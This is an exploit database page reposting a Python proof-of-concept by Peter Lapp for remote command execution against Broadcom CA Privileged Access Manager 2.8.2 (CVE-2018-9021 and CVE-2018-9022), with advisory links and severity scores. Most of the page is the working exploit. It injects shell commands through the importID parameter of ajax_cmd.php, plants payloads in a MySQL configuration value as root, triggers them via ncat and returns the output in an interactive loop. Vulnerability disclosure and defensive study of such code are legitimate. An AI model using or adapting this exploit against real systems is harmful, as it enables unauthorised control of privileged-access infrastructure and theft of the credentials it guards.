Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution

🗓️ 05 Dec 2019 00:00:00Reported by Peter LappType

exploitdb🔗 www.exploit-db.com👁 434 Views

Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Executio

Reporter	Title	Published	Views	Family All 18
0day.today	Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution Exploit #RCE	5 Dec 201900:00	–	zdt
ATTACKERKB	CVE-2018-9022	18 Jun 201818:29	–	attackerkb
ATTACKERKB	CVE-2018-9021	18 Jun 201818:29	–	attackerkb
Circl	CVE-2018-9021	5 Dec 201900:00	–	circl
Circl	CVE-2018-9022	5 Dec 201900:00	–	circl
CNVD	CA Privileged Access Manager Authentication Bypass Vulnerability	19 Jun 201800:00	–	cnvd
CNVD	CA Privileged Access Manager Authentication Bypass Vulnerability	19 Jun 201800:00	–	cnvd
Check Point Advisories	Broadcom CA Privileged Access Manager Remote Command Execution (CVE-2018-9021; CVE-2018-9022)	8 Dec 201900:00	–	checkpoint_advisories
CVE	CVE-2018-9021	18 Jun 201818:00	–	cve
CVE	CVE-2018-9022	18 Jun 201818:00	–	cve

# Title: Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
# Author: Peter Lapp
# Date: 2019-12-05
# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
# CVE: CVE-2018-9021 and CVE-2018-9022
# Tested on: v2.8.2

import urllib2
import urllib
import ssl
import sys
import json
import base64


ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE


def send_command(ip, cmd):
    cmd = urllib.quote_plus(cmd)
    url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test'
    request = urllib2.Request(url, None)
    response = urllib2.urlopen(request, context=ctx)
    result = json.load(response)
    return result['responseData']

def get_db_value():
    cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag"
    db_value = send_command(ip,cmd)
    db_value = db_value.split('\n')[1]
    return db_value
    
def encode_payload(cmd):
    sql_string = "update configuration_f set value='\\';"+cmd+" > /tmp/output;\\'' where name='ssl_vpn_network'"
    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
    return cmd
    
def restore_sql(value):
    sql_string = "update configuration_f set value='"+value+"' where name='ssl_vpn_network'"
    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
    send_command(ip,cmd)
    
def main():
    print '''Xceedium Command Execution PoC by Peter Lapp(lappsec)'''
	
    if len(sys.argv) != 2:
        print "Usage: xceedium_rce.py <target ip>"
        sys.exit()

    global ip
    ip = sys.argv[1]
    print 'Enter commands below. Type exit to quit'
	
    while True:
        cmd = raw_input('# ')
        if cmd == "exit":
            sys.exit()
        orig_value = get_db_value()
        payload = encode_payload(cmd)
        send_command(ip, payload)
        send_command(ip, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210')
        output = send_command(ip, 'cat /tmp/output')
        print output
        restore_sql(orig_value)
	


if __name__ == "__main__":
    main()

05 Dec 2019 00:00Current

9.8High risk

Vulners AI Score9.8

CVSS 27.5

CVSS 3.19.8

EPSS0.19943